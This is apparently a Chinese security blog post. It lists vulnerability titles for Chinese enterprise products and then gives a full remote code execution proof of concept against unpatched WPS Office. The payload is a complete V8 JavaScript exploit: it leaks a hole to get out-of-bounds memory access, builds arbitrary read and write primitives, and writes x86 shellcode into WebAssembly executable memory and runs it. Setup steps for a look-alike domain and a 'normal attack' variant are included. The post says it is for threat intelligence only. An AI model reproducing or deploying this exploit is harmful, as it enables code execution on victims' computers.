<li>用*时空 KSOATaskRequestServlet sql注入漏洞</li>
<li>宏* HCM codesettree SQL 注入漏洞</li>
<li>泛* ShowDocsImagesql注入漏洞</li>
<li>36* 新天擎终端安全管理系统信息泄露漏洞</li>
<li>企业微信（私有化版本）敏感信息泄露漏洞</li>
<li>华天*力oa SQL注入</li>
<li>用*文件服务器认证绕过</li>
<li>广*达 Linkworks GetIMDictionarySQL 注入漏洞</li>
<li>网* ACM 上网行为管理系统bottomframe.cgi SQL 注入漏洞</li>
<li>Panel loadfile 后台文件读取漏洞</li>
<li>金* 微信管理平台 getsysteminfo 未授权访问漏洞</li>
<li>PigCMS action_flashUpload 任意文件上传漏洞</li>
<li>Coremail 邮件系统未授权访问获取管理员账密</li>
<li>Milesight VPN server.js 任意文件读取漏洞</li>
<li>红* oa 注入</li>
<li>nginx配置错误导致的路径穿越风险</li>
<li>用*GRP-U8存在信息泄露</li>
<li>启**辰-4A 统一安全管控平台 getMater 信息泄漏</li>
</ul>
<h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h1><p>wps影响范围为：</p>
<p>WPS Office 2023 个人版 &lt; 11.1.0.15120</p>
<p>WPS Office 2019 企业版 &lt; 11.8.2.12085</p>
<p>POC</p>
<p>在1.html当前路径下启动http server并监听80端口，修改hosts文件（测试写死的）</p>
<p>127.0.0.1 <a href="http://clientweb.docer.wps.cn.cloudwps.cn/">clientweb.docer.wps.cn.cloudwps.cn</a></p>
<p><a href="http://漏洞触发需让域名规则满足clientweb.docer.wps.cn/">漏洞触发需让域名规则满足clientweb.docer.wps.cn</a>.{xxxxx}<a href="http://wps.cn/">wps.cn</a> cloudwps.cn和wps.cn没有任何关系</p>
<p>代码块在底下。（需要原pdf加wechat）</p>
<h1 id="Pyload"><a href="#Pyload" class="headerlink" title="Pyload:"></a>Pyload:</h1><figure class="highlight jsx"><table><tr><td class="code"><pre><span class="line">&lt;script&gt;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">typeof</span> alert === <span class="string">&quot;undefined&quot;</span>)&#123;</span><br><span class="line"></span><br><span class="line">alert = <span class="variable language_">console</span>.<span class="property">log</span>;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> f64 = <span class="keyword">new</span> <span class="title class_">Float64Array</span>(<span class="number">1</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> u32 = <span class="keyword">new</span> <span class="title class_">Uint32Array</span>(f64.<span class="property">buffer</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">d2u</span>(<span class="params">v</span>) &#123;</span><br><span class="line"></span><br><span class="line">f64[<span class="number">0</span>] = v;</span><br><span class="line"></span><br><span class="line"><span class="keyword">return</span> u32;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">u2d</span>(<span class="params">lo, hi</span>) &#123;</span><br><span class="line"></span><br><span class="line">u32[<span class="number">0</span>] = lo;</span><br><span class="line"></span><br><span class="line">u32[<span class="number">1</span>] = hi;</span><br><span class="line"></span><br><span class="line"><span class="keyword">return</span> f64[<span class="number">0</span>];</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">gc</span>(<span class="params"></span>)&#123; <span class="comment">// major</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; <span class="number">0x10</span>; i++) &#123;</span><br><span class="line"></span><br><span class="line"><span class="keyword">new</span> <span class="title class_">Array</span>(<span class="number">0x100000</span>);</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">foo</span>(<span class="params">bug</span>) &#123;</span><br><span class="line"></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">C</span>(<span class="params">z</span>) &#123;</span><br><span class="line"></span><br><span class="line"><span class="title class_">Error</span>.<span class="property">prepareStackTrace</span> = <span class="keyword">function</span>(<span class="params">t, B</span>) &#123;</span><br><span class="line"></span><br><span class="line"><span class="keyword">return</span> B[z].<span class="title function_">getThis</span>();</span><br><span class="line"></span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> p = <span class="title class_">Error</span>().<span class="property">stack</span>;</span><br><span class="line"></span><br><span class="line"><span class="title class_">Error</span>.<span class="property">prepareStackTrace</span> = <span class="literal">null</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">return</span> p;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">J</span>(<span class="params"></span>) &#123;&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> optim = <span class="literal">false</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> opt = <span class="keyword">new</span> <span class="title class_">Function</span>(</span><br><span class="line"></span><br><span class="line"><span class="string">&#x27;a&#x27;</span>, <span class="string">&#x27;b&#x27;</span>, <span class="string">&#x27;c&#x27;</span>,</span><br><span class="line"></span><br><span class="line"><span class="string">&#x27;if(typeof a===\&#x27;number\&#x27;)&#123;if(a&gt;2)&#123;for(var</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">i=0;i&lt;100;i++);return;&#125;b.d(a,b,1);return&#125;&#x27;</span> +</span><br><span class="line"></span><br><span class="line"><span class="string">&#x27;g++;&#x27;</span>.<span class="title function_">repeat</span>(<span class="number">70</span>));</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> e = <span class="literal">null</span>;</span><br><span class="line"></span><br><span class="line">J.<span class="property"><span class="keyword">prototype</span></span>.<span class="property">d</span> = <span class="keyword">new</span> <span class="title class_">Function</span>(</span><br><span class="line"></span><br><span class="line"><span class="string">&#x27;a&#x27;</span>, <span class="string">&#x27;b&#x27;</span>, <span class="string">&#x27;&quot;use strict&quot;;b.a.call(arguments,b);return arguments[a];&#x27;</span>);</span><br><span class="line"></span><br><span class="line">J.<span class="property"><span class="keyword">prototype</span></span>.<span class="property">a</span> = <span class="keyword">new</span> <span class="title class_">Function</span>(<span class="string">&#x27;a&#x27;</span>, <span class="string">&#x27;a.b(0,a)&#x27;</span>);</span><br><span class="line"></span><br><span class="line">J.<span class="property"><span class="keyword">prototype</span></span>.<span class="property">b</span> = <span class="keyword">new</span> <span class="title class_">Function</span>(</span><br><span class="line"></span><br><span class="line"><span class="string">&#x27;a&#x27;</span>, <span class="string">&#x27;b&#x27;</span>,</span><br><span class="line"></span><br><span class="line"><span class="string">&#x27;b.c();if(a)&#123;&#x27;</span> +</span><br><span class="line"></span><br><span class="line"><span class="string">&#x27;g++;&#x27;</span>.<span class="title function_">repeat</span>(<span class="number">70</span>) + <span class="string">&#x27;&#125;&#x27;</span>);</span><br><span class="line"></span><br><span class="line">J.<span class="property"><span class="keyword">prototype</span></span>.<span class="property">c</span> = <span class="keyword">function</span>(<span class="params"></span>) &#123;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (optim) &#123;</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> z = <span class="title function_">C</span>(<span class="number">3</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> p = <span class="title function_">C</span>(<span class="number">3</span>);</span><br><span class="line"></span><br><span class="line">z[<span class="number">0</span>] = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">e = &#123;<span class="attr">M</span>: z, <span class="attr">C</span>: p&#125;;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> a = <span class="keyword">new</span> <span class="title function_">J</span>();</span><br><span class="line"></span><br><span class="line"><span class="comment">// jit optim</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (bug) &#123;</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">var</span> V = <span class="number">0</span>; <span class="number">1E4</span> &gt; V; V++) &#123;</span><br><span class="line"></span><br><span class="line"><span class="title function_">opt</span>(<span class="number">0</span> == V % <span class="number">4</span> ? <span class="number">1</span> : <span class="number">4</span>, a, <span class="number">1</span>);</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">optim = <span class="literal">true</span>;</span><br><span class="line"></span><br><span class="line"><span class="title function_">opt</span>(<span class="number">1</span>, a, <span class="number">1</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">return</span> e;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">e1 = <span class="title function_">foo</span>(<span class="literal">false</span>);</span><br><span class="line"></span><br><span class="line">e2 = <span class="title function_">foo</span>(<span class="literal">true</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">delete</span> e2.<span class="property">M</span>[<span class="number">0</span>];</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> hole = e2.<span class="property">C</span>[<span class="number">0</span>];</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> map = <span class="keyword">new</span> <span class="title class_">Map</span>();</span><br><span class="line"></span><br><span class="line">map.<span class="title function_">set</span>(<span class="string">&#x27;asd&#x27;</span>, <span class="number">8</span>);</span><br><span class="line"></span><br><span class="line">map.<span class="title function_">set</span>(hole, <span class="number">0x8</span>);</span><br><span class="line"></span><br><span class="line">map.<span class="title function_">delete</span>(hole);</span><br><span class="line"></span><br><span class="line">map.<span class="title function_">delete</span>(hole);</span><br><span class="line"></span><br><span class="line">map.<span class="title function_">delete</span>(<span class="string">&quot;asd&quot;</span>);</span><br><span class="line"></span><br><span class="line">map.<span class="title function_">set</span>(<span class="number">0x20</span>, <span class="string">&quot;aaaa&quot;</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> arr3 = <span class="keyword">new</span> <span class="title class_">Array</span>(<span class="number">0</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> arr4 = <span class="keyword">new</span> <span class="title class_">Array</span>(<span class="number">0</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> arr5 = <span class="keyword">new</span> <span class="title class_">Array</span>(<span class="number">1</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> oob_array = [];</span><br><span class="line"></span><br><span class="line">oob_array.<span class="title function_">push</span>(<span class="number">1.1</span>);</span><br><span class="line"></span><br><span class="line">map.<span class="title function_">set</span>(<span class="string">&quot;1&quot;</span>, -<span class="number">1</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> obj_array = &#123;</span><br><span class="line"></span><br><span class="line"><span class="attr">m</span>: <span class="number">1337</span>, <span class="attr">target</span>: gc</span><br><span class="line"></span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> ab = <span class="keyword">new</span> <span class="title class_">ArrayBuffer</span>(<span class="number">1337</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> object_idx = <span class="literal">undefined</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> object_idx_flag = <span class="literal">undefined</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> max_size = <span class="number">0x1000</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; max_size; i++) &#123;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (<span class="title function_">d2u</span>(oob_array[i])[<span class="number">0</span>] === <span class="number">0xa72</span>) &#123;</span><br><span class="line"></span><br><span class="line">object_idx = i;</span><br><span class="line"></span><br><span class="line">object_idx_flag = <span class="number">1</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">break</span>;</span><br><span class="line"></span><br><span class="line">&#125;<span class="keyword">if</span> (<span class="title function_">d2u</span>(oob_array[i])[<span class="number">1</span>] === <span class="number">0xa72</span>) &#123;</span><br><span class="line"></span><br><span class="line">object_idx = i + <span class="number">1</span>;</span><br><span class="line"></span><br><span class="line">object_idx_flag = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">break</span>;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">addrof</span>(<span class="params">obj_para</span>) &#123;</span><br><span class="line"></span><br><span class="line">obj_array.<span class="property">target</span> = obj_para;</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> addr = <span class="title function_">d2u</span>(oob_array[object_idx])[object_idx_flag] - <span class="number">1</span>;</span><br><span class="line"></span><br><span class="line">obj_array.<span class="property">target</span> = gc;</span><br><span class="line"></span><br><span class="line"><span class="keyword">return</span> addr;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">fakeobj</span>(<span class="params">addr</span>) &#123;</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> r8 = <span class="title function_">d2u</span>(oob_array[object_idx]);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (object_idx_flag === <span class="number">0</span>) &#123;</span><br><span class="line"></span><br><span class="line">oob_array[object_idx] = <span class="title function_">u2d</span>(addr, r8[<span class="number">1</span>]);</span><br><span class="line"></span><br><span class="line">&#125;<span class="keyword">else</span> &#123;</span><br><span class="line"></span><br><span class="line">oob_array[object_idx] = <span class="title function_">u2d</span>(r8[<span class="number">0</span>], addr);</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">return</span> obj_array.<span class="property">target</span>;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> bk_idx = <span class="literal">undefined</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> bk_idx_flag = <span class="literal">undefined</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; max_size; i++) &#123;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (<span class="title function_">d2u</span>(oob_array[i])[<span class="number">0</span>] === <span class="number">1337</span>) &#123;</span><br><span class="line"></span><br><span class="line">bk_idx = i;</span><br><span class="line"></span><br><span class="line">bk_idx_flag = <span class="number">1</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">break</span>;</span><br><span class="line"></span><br><span class="line">&#125;<span class="keyword">if</span> (<span class="title function_">d2u</span>(oob_array[i])[<span class="number">1</span>] === <span class="number">1337</span>) &#123;</span><br><span class="line"></span><br><span class="line">bk_idx = i + <span class="number">1</span>;</span><br><span class="line"></span><br><span class="line">bk_idx_flag = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">break</span>;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> dv = <span class="keyword">new</span> <span class="title class_">DataView</span>(ab);</span><br><span class="line"></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">get_32</span>(<span class="params">addr</span>) &#123;</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> r8 = <span class="title function_">d2u</span>(oob_array[bk_idx]);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (bk_idx_flag === <span class="number">0</span>) &#123;</span><br><span class="line"></span><br><span class="line">oob_array[bk_idx] = <span class="title function_">u2d</span>(addr, r8[<span class="number">1</span>]);</span><br><span class="line"></span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line"></span><br><span class="line">oob_array[bk_idx] = <span class="title function_">u2d</span>(r8[<span class="number">0</span>], addr);</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> val = dv.<span class="title function_">getUint32</span>(<span class="number">0</span>, <span class="literal">true</span>);</span><br><span class="line"></span><br><span class="line">oob_array[bk_idx] = <span class="title function_">u2d</span>(r8[<span class="number">0</span>], r8[<span class="number">1</span>]);</span><br><span class="line"></span><br><span class="line"><span class="keyword">return</span> val;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">set_32</span>(<span class="params">addr, val</span>) &#123;</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> r8 = <span class="title function_">d2u</span>(oob_array[bk_idx]);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (bk_idx_flag === <span class="number">0</span>) &#123;</span><br><span class="line"></span><br><span class="line">oob_array[bk_idx] = <span class="title function_">u2d</span>(addr, r8[<span class="number">1</span>]);</span><br><span class="line"></span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line"></span><br><span class="line">oob_array[bk_idx] = <span class="title function_">u2d</span>(r8[<span class="number">0</span>], addr);</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">dv.<span class="title function_">setUint32</span>(<span class="number">0</span>, val, <span class="literal">true</span>);</span><br><span class="line"></span><br><span class="line">oob_array[bk_idx] = <span class="title function_">u2d</span>(r8[<span class="number">0</span>], r8[<span class="number">1</span>]);</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">write8</span>(<span class="params">addr, val</span>) &#123;</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> r8 = <span class="title function_">d2u</span>(oob_array[bk_idx]);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (bk_idx_flag === <span class="number">0</span>) &#123;</span><br><span class="line"></span><br><span class="line">oob_array[bk_idx] = <span class="title function_">u2d</span>(addr, r8[<span class="number">1</span>]);</span><br><span class="line"></span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line"></span><br><span class="line">oob_array[bk_idx] = <span class="title function_">u2d</span>(r8[<span class="number">0</span>], addr);</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">dv.<span class="title function_">setUint8</span>(<span class="number">0</span>, val);</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> fake_length = <span class="title function_">get_32</span>(<span class="title function_">addrof</span>(oob_array)+<span class="number">12</span>);</span><br><span class="line"></span><br><span class="line"><span class="title function_">set_32</span>(<span class="title function_">get_32</span>(<span class="title function_">addrof</span>(oob_array)+<span class="number">8</span>)+<span class="number">4</span>,fake_length);</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> wasm_code = <span class="keyword">new</span></span><br><span class="line"></span><br><span class="line"><span class="title class_">Uint8Array</span>([<span class="number">0</span>,<span class="number">97</span>,<span class="number">115</span>,<span class="number">109</span>,<span class="number">1</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">133</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">96</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">127</span>,<span class="number">3</span>,<span class="number">130</span>,<span class="number">128</span>,<span class="number">128</span>,</span><br><span class="line"></span><br><span class="line"><span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">0</span>,<span class="number">4</span>,<span class="number">132</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">112</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">5</span>,<span class="number">131</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">6</span>,<span class="number">129</span>,<span class="number">128</span>,<span class="number">128</span>,</span><br><span class="line"></span><br><span class="line"><span class="number">128</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">7</span>,<span class="number">145</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">2</span>,<span class="number">6</span>,<span class="number">109</span>,<span class="number">101</span>,<span class="number">109</span>,<span class="number">111</span>,<span class="number">114</span>,<span class="number">121</span>,<span class="number">2</span>,<span class="number">0</span>,<span class="number">4</span>,<span class="number">109</span>,<span class="number">97</span>,<span class="number">105</span>,<span class="number">110</span>,<span class="number">0</span>,<span class="number">0</span></span><br><span class="line"></span><br><span class="line">,<span class="number">10</span>,<span class="number">138</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">132</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">65</span>,<span class="number">42</span>,<span class="number">11</span>]);</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> wasm_mod = <span class="keyword">new</span> <span class="title class_">WebAssembly</span>.<span class="title class_">Module</span>(wasm_code);</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> wasm_instance = <span class="keyword">new</span> <span class="title class_">WebAssembly</span>.<span class="title class_">Instance</span>(wasm_mod);</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> f = wasm_instance.<span class="property">exports</span>.<span class="property">main</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> target_addr = <span class="title function_">addrof</span>(wasm_instance)+<span class="number">0x40</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> rwx_mem = <span class="title function_">get_32</span>(target_addr);</span><br><span class="line"></span><br><span class="line"><span class="comment">//alert(&quot;rwx_mem is&quot;+rwx_mem.toString(16));</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> shellcode = <span class="keyword">new</span> <span class="title class_">Uint8Array</span>([<span class="number">0xfc</span>, <span class="number">0xe8</span>, <span class="number">0x82</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x60</span>, <span class="number">0x89</span>,</span><br><span class="line"></span><br><span class="line"><span class="number">0xe5</span>, <span class="number">0x31</span>, <span class="number">0xc0</span>, <span class="number">0x64</span>, <span class="number">0x8b</span>, <span class="number">0x50</span>, <span class="number">0x30</span>,<span class="number">0x8b</span>, <span class="number">0x52</span>, <span class="number">0x0c</span>, <span class="number">0x8b</span>, <span class="number">0x52</span>, <span class="number">0x14</span>,</span><br><span class="line"></span><br><span class="line"><span class="number">0x8b</span>, <span class="number">0x72</span>, <span class="number">0x28</span>, <span class="number">0x0f</span>, <span class="number">0xb7</span>, <span class="number">0x4a</span>, <span class="number">0x26</span>, <span class="number">0x31</span>, <span class="number">0xff</span>,<span class="number">0xac</span>, <span class="number">0x3c</span>, <span class="number">0x61</span>, <span class="number">0x7c</span>,</span><br><span class="line"></span><br><span class="line"><span class="number">0x02</span>, <span class="number">0x2c</span>, <span class="number">0x20</span>, <span class="number">0xc1</span>, <span class="number">0xcf</span>, <span class="number">0x0d</span>, <span class="number">0x01</span>, <span class="number">0xc7</span>, <span class="number">0xe2</span>, <span class="number">0xf2</span>, <span class="number">0x52</span>,<span class="number">0x57</span>, <span class="number">0x8b</span>,</span><br><span class="line"></span><br><span class="line"><span class="number">0x52</span>, <span class="number">0x10</span>, <span class="number">0x8b</span>, <span class="number">0x4a</span>, <span class="number">0x3c</span>, <span class="number">0x8b</span>, <span class="number">0x4c</span>, <span class="number">0x11</span>, <span class="number">0x78</span>, <span class="number">0xe3</span>, <span class="number">0x48</span>, <span class="number">0x01</span>,</span><br><span class="line"></span><br><span class="line"><span class="number">0xd1</span>,<span class="number">0x51</span>, <span class="number">0x8b</span>, <span class="number">0x59</span>, <span class="number">0x20</span>, <span class="number">0x01</span>, <span class="number">0xd3</span>, <span class="number">0x8b</span>, <span class="number">0x49</span>, <span class="number">0x18</span>, <span class="number">0xe3</span>, <span class="number">0x3a</span>, <span class="number">0x49</span>,</span><br><span class="line"></span><br><span class="line"><span class="number">0x8b</span>, <span class="number">0x34</span>, <span class="number">0x8b</span>,<span class="number">0x01</span>, <span class="number">0xd6</span>, <span class="number">0x31</span>, <span class="number">0xff</span>, <span class="number">0xac</span>, <span class="number">0xc1</span>, <span class="number">0xcf</span>, <span class="number">0x0d</span>, <span class="number">0x01</span>, <span class="number">0xc7</span>,</span><br><span class="line"></span><br><span class="line"><span class="number">0x38</span>, <span class="number">0xe0</span>, <span class="number">0x75</span>, <span class="number">0xf6</span>, <span class="number">0x03</span>,<span class="number">0x7d</span>, <span class="number">0xf8</span>, <span class="number">0x3b</span>, <span class="number">0x7d</span>, <span class="number">0x24</span>, <span class="number">0x75</span>, <span class="number">0xe4</span>, <span class="number">0x58</span>,</span><br><span class="line"></span><br><span class="line"><span class="number">0x8b</span>, <span class="number">0x58</span>, <span class="number">0x24</span>, <span class="number">0x01</span>, <span class="number">0xd3</span>, <span class="number">0x66</span>, <span class="number">0x8b</span>,<span class="number">0x0c</span>, <span class="number">0x4b</span>, <span class="number">0x8b</span>, <span class="number">0x58</span>, <span class="number">0x1c</span>, <span class="number">0x01</span>,</span><br><span class="line"></span><br><span class="line"><span class="number">0xd3</span>, <span class="number">0x8b</span>, <span class="number">0x04</span>, <span class="number">0x8b</span>, <span class="number">0x01</span>, <span class="number">0xd0</span>, <span class="number">0x89</span>, <span class="number">0x44</span>, <span class="number">0x24</span>,<span class="number">0x24</span>, <span class="number">0x5b</span>, <span class="number">0x5b</span>, <span class="number">0x61</span>,</span><br><span class="line"></span><br><span class="line"><span class="number">0x59</span>, <span class="number">0x5a</span>, <span class="number">0x51</span>, <span class="number">0xff</span>, <span class="number">0xe0</span>, <span class="number">0x5f</span>, <span class="number">0x5f</span>, <span class="number">0x5a</span>, <span class="number">0x8b</span>, <span class="number">0x12</span>, <span class="number">0xeb</span>,<span class="number">0x8d</span>, <span class="number">0x5d</span>,</span><br><span class="line"></span><br><span class="line"><span class="number">0x6a</span>, <span class="number">0x01</span>, <span class="number">0x8d</span>, <span class="number">0x85</span>, <span class="number">0xb2</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x50</span>, <span class="number">0x68</span>, <span class="number">0x31</span>, <span class="number">0x8b</span>,</span><br><span class="line"></span><br><span class="line"><span class="number">0x6f</span>,<span class="number">0x87</span>, <span class="number">0xff</span>, <span class="number">0xd5</span>, <span class="number">0xbb</span>, <span class="number">0xe0</span>, <span class="number">0x1d</span>, <span class="number">0x2a</span>, <span class="number">0x0a</span>, <span class="number">0x68</span>, <span class="number">0xa6</span>, <span class="number">0x95</span>, <span class="number">0xbd</span>,</span><br><span class="line"></span><br><span class="line"><span class="number">0x9d</span>, <span class="number">0xff</span>, <span class="number">0xd5</span>,<span class="number">0x3c</span>, <span class="number">0x06</span>, <span class="number">0x7c</span>, <span class="number">0x0a</span>, <span class="number">0x80</span>, <span class="number">0xfb</span>, <span class="number">0xe0</span>, <span class="number">0x75</span>, <span class="number">0x05</span>, <span class="number">0xbb</span>,</span><br><span class="line"></span><br><span class="line"><span class="number">0x47</span>, <span class="number">0x13</span>, <span class="number">0x72</span>, <span class="number">0x6f</span>, <span class="number">0x6a</span>,<span class="number">0x00</span>, <span class="number">0x53</span>, <span class="number">0xff</span>, <span class="number">0xd5</span>, <span class="number">0x63</span>, <span class="number">0x61</span>, <span class="number">0x6c</span>, <span class="number">0x63</span>,</span><br><span class="line"></span><br><span class="line"><span class="number">0x00</span>]);</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">let</span> i=<span class="number">0</span>;i&lt;shellcode.<span class="property">length</span>;i++)&#123;</span><br><span class="line"></span><br><span class="line"><span class="title function_">write8</span>(rwx_mem+i,shellcode[i]);</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="title function_">f</span>();</span><br><span class="line"></span><br><span class="line">&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p>需要将在1.html当前路径下启动http server并监听80端口，修改hosts文件（测试写死的）</p>
<p>127.0.0.1 <a href="http://clientweb.docer.wps.cn.cloudwps.cn/">clientweb.docer.wps.cn.cloudwps.cn</a></p>
<p><a href="http://漏洞触发需让域名规则满足clientweb.docer.wps.cn/">漏洞触发需让域名规则满足clientweb.docer.wps.cn</a>.{xxxxx}wps.cn即可，cloudwps.cn和wps.cn没有任何关系。正常攻击，<a href="http://也可以使用clientweb.docer.wps.cn.hellowps.cn/">也可以使用clientweb.docer.wps.cn.hellowps.cn</a>.</p>
<p><strong>说明</strong></p>
<p><strong>资料搜集来源于互联网，仅做技术分享与hvv威胁情报预警，切勿用于违法行为。</strong></p>
<h1 id="每日更新漏洞情报-一键三连加关注"><a href="#每日更新漏洞情报-一键三连加关注" class="headerlink" title="每日更新漏洞情报   一键三连加关注"></a>每日更新漏洞情报   一键三连加关注</h1><h1 id="微信公众号-搜索人遁安全"><a href="#微信公众号-搜索人遁安全" class="headerlink" title="微信公众号 搜索人遁安全"></a>微信公众号 搜索人遁安全</h1><p><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F15a7bed4-43b3-40c8-8d2f-cdf07b0e354c%2FUntitled.png?table=block&id=94f1ad77-b3ed-459f-9552-2bad08adf475&spaceId=c83b5e26-6112-4af3-b822-de3746064a99&name=Untitled.png&userId=31606ab3-eb91-448c-9776-acb1215f91c2&cache=v2" alt="Untitled"></p>
</div></div></div>

